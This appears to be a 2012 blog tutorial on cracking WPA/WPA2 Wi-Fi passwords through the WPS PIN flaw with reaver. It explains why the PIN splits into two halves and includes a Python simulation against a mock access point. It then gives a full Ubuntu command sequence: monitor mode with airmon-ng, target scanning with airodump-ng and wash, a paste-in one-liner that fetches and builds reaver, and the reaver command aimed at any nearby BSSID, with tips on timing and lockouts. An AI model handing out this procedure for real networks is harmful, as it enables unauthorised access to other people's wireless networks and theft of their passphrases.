22/02/2012

How to crack WPA/WPA2 without a dictionary in 4-10 hours with reaver


The reign of secure WPA/WPA2 network encryption is now over... well, sort of, as it does depend on the setup of the router. It no longer takes decades to crack, thanks to Tactical Network Solutions. Their team found a weakness in Wi-Fi Protected Setup (WPS), not in WPA/WPA2 itself: when an external registrar submits the 8-digit WPS PIN, the access point confirms the first four digits and the last four digits separately, and the last digit is only a checksum. That shrinks a 100,000,000-PIN space to at most 10,000 + 1,000 = 11,000 online guesses, after which the access point hands over the WPA/WPA2 passphrase. Any router with WPS enabled (most consumer routers ship that way) is affected; one with WPS disabled is not. We'll be using the tool they wrote to exploit this bug, reaver.
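To make the arithmetic behind "no longer takes decades" concrete, here is a small Python model of the WPS PIN check. It is an added example, not code from the original post or from reaver: the access point is simulated by a hypothetical WpsRegistrar class that answers the way a flawed AP answers at WPS messages M4 and M6, and no radio traffic is involved. The checksum routine follows the WPS specification's weighted digit sum; the PINs fed to it are constructed for the demonstration.

```python
"""Model of the WPS PIN split that reaver exploits (added example, not reaver code)."""


def wps_checksum(first_seven: int) -> int:
    """Return the 8th (check) digit for the first seven PIN digits.

    WPS weights the digits 3,1,3,1,3,1,3 from the most significant digit and
    picks the check digit that makes the weighted sum a multiple of 10.
    """
    accum, n = 0, first_seven
    while n:
        accum += 3 * (n % 10)   # digits 7, 5, 3, 1 (counting from the right)
        n //= 10
        accum += n % 10         # digits 6, 4, 2
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if an 8-digit string carries a correct WPS check digit."""
    return (len(pin) == 8 and pin.isdigit()
            and int(pin[7]) == wps_checksum(int(pin[:7])))


def keyspace_sizes() -> dict:
    """Number of guesses an attacker must budget for, three ways."""
    return {
        "naive_8_digits": 10**8,          # every 8-digit number
        "checksum_aware": 10**7,          # only PINs with a valid check digit
        "split_halves": 10**4 + 10**3,    # what the M4/M6 NACKs actually allow
    }


class WpsRegistrar:
    """Hypothetical stand-in for the access point's WPS registrar."""

    def __init__(self, pin: str):
        if not is_valid_pin(pin):
            raise ValueError("AP PIN must be a valid 8-digit WPS PIN")
        self.pin = pin
        self.attempts = 0   # one attempt = one full WPS exchange

    def try_pin(self, first_half: str, second_half: str) -> str:
        """Answer like a flawed AP: the two halves are confirmed independently.

        A wrong PSK1 (first four digits) earns a NACK at M4, so the attacker
        learns the first half is wrong before the second half is ever checked.
        A wrong PSK2 (last four digits) earns a NACK at M6.
        """
        self.attempts += 1
        if first_half != self.pin[:4]:
            return "nack-m4"
        if second_half != self.pin[4:]:
            return "nack-m6"
        return "ok"


def recover_pin(ap: WpsRegistrar) -> str:
    """Two-phase online brute force: at most 10,000 + 1,000 exchanges."""
    # Phase 1: find PSK1. The second half is a placeholder; anything other
    # than an M4 NACK means the first four digits are right.
    first = next(f"{i:04d}" for i in range(10_000)
                 if ap.try_pin(f"{i:04d}", "0000") != "nack-m4")
    # Phase 2: find PSK2. Only three digits are free; the 8th is the checksum.
    for j in range(1_000):
        tail = f"{j:03d}"
        second = tail + str(wps_checksum(int(first + tail)))
        if ap.try_pin(first, second) == "ok":
            return first + second
    raise RuntimeError("PIN not recovered; AP did not behave as modelled")


if __name__ == "__main__":
    print(keyspace_sizes())
    # Constructed worst-case PIN: both halves are the last ones tried.
    ap = WpsRegistrar("99999995")
    print(recover_pin(ap), "recovered in", ap.attempts, "exchanges")
```

Run it directly and the worst case comes out at 11,000 exchanges, against the 10,000,000 checksum-valid PINs an attacker would face if the AP only ever said yes or no to the whole PIN. Multiply 11,000 by the one to three seconds a real WPS exchange takes and you get the 4-10 hours in the title.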

I will take you through how this is done on a Linux machine, specifically Ubuntu, using the terminal:

1. Install aircrack-ng:
sudo apt-get install aircrack-ng
2. Put the Wi-Fi adapter into monitor mode (airmon-ng creates a monitor interface, normally mon0):
sudo airmon-ng start wlan0
3. Use airodump-ng to scan for WPA/WPA2 networks and their BSSIDs:
sudo airodump-ng mon0
4. Press <Ctrl+C> after a few seconds, or once the list of BSSIDs has populated. It should look like this:


The BSSIDs are listed on the left; these are the MAC addresses of the surrounding access points. Pick one whose ENC column shows WPA or WPA2 and whose AUTH column shows PSK (Pre-Shared Key), i.e. a home or small-office network rather than an enterprise (MGT/802.1X) one. Note that airodump-ng does not tell you whether WPS is enabled on the router, and reaver can only attack WPS-enabled targets. reaver ships with a companion scanner, wash (sudo wash -i mon0), which lists only WPS-enabled access points and flags those that have locked WPS, so it is worth running before committing hours to a target.

Don't close this terminal; open a new one and work in that from now on.

READ STEPS 5-8, OR JUST COPY AND PASTE THIS INTO YOUR TERMINAL AND THEN SKIP TO STEP 9:
sudo apt-get install libpcap-dev libsqlite3-dev && wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz && tar xfvz reaver-1.4.tar.gz && cd reaver-1.4/src/ && ./configure && make && sudo make install
5. Install the build dependencies (reaver links against libpcap and libsqlite3, so both development packages are needed or ./configure will fail):
sudo apt-get install libpcap-dev libsqlite3-dev
6. Download reaver:
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
7. Extract the reaver tar.gz file:
tar xfvz reaver-1.4.tar.gz
8. Build and install reaver:
cd reaver-1.4/src/ && ./configure && make && sudo make install
9. Get cracking! Copy the BSSID you chose from the other terminal and enter it like this:
sudo reaver -i mon0 -b <paste BSSID here!!> -vv
-i mon0 = use the mon0 interface, which is your Wi-Fi adapter in monitor mode.
-b "some BSSID" = the router to crack.
-vv = give very verbose output.
Optionally add -c <channel> (the CH column in airodump-ng) so reaver does not have to hunt for the target's channel itself.

10. Now wait. Each PIN attempt is a full WPS exchange taking roughly one to three seconds, so the worst case of 11,000 attempts works out to around 4-10 hours; a PIN that sits early in the search space finishes much sooner. Some access points lock WPS after a run of failed attempts, in which case reaver pauses and retries (see its --lock-delay option), and a router with WPS disabled cannot be attacked this way at all. When reaver finds the PIN it prints it along with the WPA/WPA2 passphrase (the WPA PSK).

So I hope people have found this useful. It was only meant as a walkthrough rather than a detailed look at how it all works.